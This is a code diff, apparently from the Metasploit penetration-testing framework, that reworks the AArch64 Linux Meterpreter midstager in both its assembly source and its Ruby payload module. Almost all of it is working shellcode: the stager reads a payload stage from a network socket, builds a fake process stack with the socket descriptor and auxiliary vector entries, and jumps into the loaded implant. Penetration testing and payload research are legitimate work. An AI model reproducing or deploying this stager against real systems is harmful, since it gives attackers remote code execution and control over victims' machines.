diff --git a/external/source/shellcode/linux/aarch64/stage_mettle.s b/external/source/shellcode/linux/aarch64/stage_mettle.s index b10f4b8a32..eedf65b677 100644 --- a/external/source/shellcode/linux/aarch64/stage_mettle.s +++ b/external/source/shellcode/linux/aarch64/stage_mettle.s @@ -44,81 +44,48 @@ read_loop: subs x4, x4, x0 bne read_loop - /* set up the initial stack */ - /* - - add sp, sp, #80 - mov x4, #109 - eor x5, x5, x5 - stp x4, x5, [sp, #-16]! - - mov x1,#2 - mov x2,sp - mov x3,#0 - - mov x4,#2 - mov x5,sp - mov x6,x12 - mov x7,#0 - mov x8,#0 - mov x9,#7 - mov x10,x10 - mov x11,#0 - mov x12,#0 - - eor x0, x0, x0 - eor x1, x1, x1 - eor x2, x2, x2 - eor x3, x3, x3 - stp x4, x5, [sp, #-16]! - stp x6, x7, [sp, #-16]! - stp x7, x8, [sp, #-16]! - stp x9, x10, [sp, #-16]! - stp x11, x12, [sp, #-16]! - */ - + /* add entry_offset */ adr x0, entry ldr x0, [x0] - // entry_offset + mmap add x0, x0, x10 + mov x14, x0 - mov x8, x0 + /* set up the initial stack */ + mov x0, sp + and sp, x0, #-16 + add sp, sp, #(16 * 6) + /* argc = 2, argv[0] = 'm' */ + mov x0, #2 + mov x1, #109 + str x1, [sp] + mov x1, sp + stp x0, x1, [sp, #-16]! - /* Set up the fake stack. - For whatever reason, aarch64 binaries really want AT_RANDOM - to be available. */ - /* AT_NULL */ - eor x0, x0, x0 - eor x1, x1, x1 - stp x0, x1, [sp, #-16]! - /* AT_RANDOM */ - mov x2, #25 - mov x3, sp - stp x2, x3, [sp, #-16]! + /* argc = 2, argv[1] = 'x12 (sockfd)' */ + mov x2, x12 + mov x3, 0 + stp x2, x3, [sp, #-16]! - /* argc, argv[0], argv[1], envp */ - /* ideally these could all be empty, but unfortunately - we have to keep the stack aligned. it's easier to - just push an extra argument than care... */ - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - mov x0, 1 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x4, 0 + mov x5, #7 /* AT_BASE */ + stp x4, x5, [sp, #-16]! - br x8 + mov x6, x10 + mov x7, #6 /* AT_PAGESZ */ + stp x6, x7, [sp, #-16]! - /* - mov x0, #109 - mov x1, x12 - stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */ - /* mov x0, 2 - mov x1, sp - stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */ + mov x8, #0x1000 + mov x9, #25 /* AT_RANDOM */ + stp x8, x9, [sp, #-16]! - /* - blr x8 - */ + mov x10, x10 + mov x11, #0 /* AT_NULL */ + stp x10, x11, [sp, #-16]! + + mov x29, #0 + mov x30, #0 + br x14 failed: mov x0, 0 @@ -132,6 +99,3 @@ size: entry: .word ENTRY .word 0 -m: -.word 0x0000006d -.word 0x00000000 diff --git a/modules/payloads/stages/linux/aarch64/meterpreter.rb b/modules/payloads/stages/linux/aarch64/meterpreter.rb index 43a0ca6615..a585ad2210 100644 --- a/modules/payloads/stages/linux/aarch64/meterpreter.rb +++ b/modules/payloads/stages/linux/aarch64/meterpreter.rb @@ -41,8 +41,7 @@ module MetasploitModule midstager = [ - - 0x10000582, # adr x2, b0 + 0x10000782, # adr x2, f0 0xb9400042, # ldr w2, [x2] 0xaa0203ea, # mov x10, x2 0xd34cfc42, # lsr x2, x2, #12 @@ -64,36 +63,49 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000260, # cbz w0, a4 + 0x34000440, # cbz w0, e0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 0x54ffff01, # b.ne 44 - 0x10000280, # adr x0, b8 + 0x10000480, # adr x0, f8 0xf9400000, # ldr x0, [x0] 0x8b0a0000, # add x0, x0, x10 - 0xaa0003e8, # mov x8, x0 - 0xca000000, # eor x0, x0, x0 - 0xca010021, # eor x1, x1, x1 - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800322, # mov x2, #0x19 // #25 - 0x910003e3, # mov x3, sp - 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! - 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd2800020, # mov x0, #0x1 // #1 + 0xaa0003ee, # mov x14, x0 + 0x910003e0, # mov x0, sp + 0x927cec1f, # and sp, x0, #0xfffffffffffffff0 + 0x910183ff, # add sp, sp, #0x60 + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800da1, # mov x1, #0x6d // #109 + 0xf90003e1, # str x1, [sp] 0x910003e1, # mov x1, sp 0xa9bf07e0, # stp x0, x1, [sp,#-16]! - 0xd61f0100, # br x8 + 0xaa0c03e2, # mov x2, x12 + 0xd2800003, # mov x3, #0x0 // #0 + 0xa9bf0fe2, # stp x2, x3, [sp,#-16]! + 0xd2800004, # mov x4, #0x0 // #0 + 0xd28000e5, # mov x5, #0x7 // #7 + 0xa9bf17e4, # stp x4, x5, [sp,#-16]! + 0xaa0a03e6, # mov x6, x10 + 0xd28000c7, # mov x7, #0x6 // #6 + 0xa9bf1fe6, # stp x6, x7, [sp,#-16]! + 0xd2820008, # mov x8, #0x1000 // #4096 + 0xd2800329, # mov x9, #0x19 // #25 + 0xa9bf27e8, # stp x8, x9, [sp,#-16]! + 0xaa0a03ea, # mov x10, x10 + 0xd280000b, # mov x11, #0x0 // #0 + 0xa9bf2fea, # stp x10, x11, [sp,#-16]! + 0xd280001d, # mov x29, #0x0 // #0 + 0xd280001e, # mov x30, #0x0 // #0 + 0xd61f01c0, # br x14 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0 + 0xd503201f, # nop + payload.length, 0x00000000, # .word 0x00000000 entry_offset, 0x00000000, # .word 0x00000000 - 0x0000006d, # .word 0x0000006d - 0x00000000, # .word 0x00000000 - 0xd503201f, # nop - 0xd503201f, # nop ].pack('V*') print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")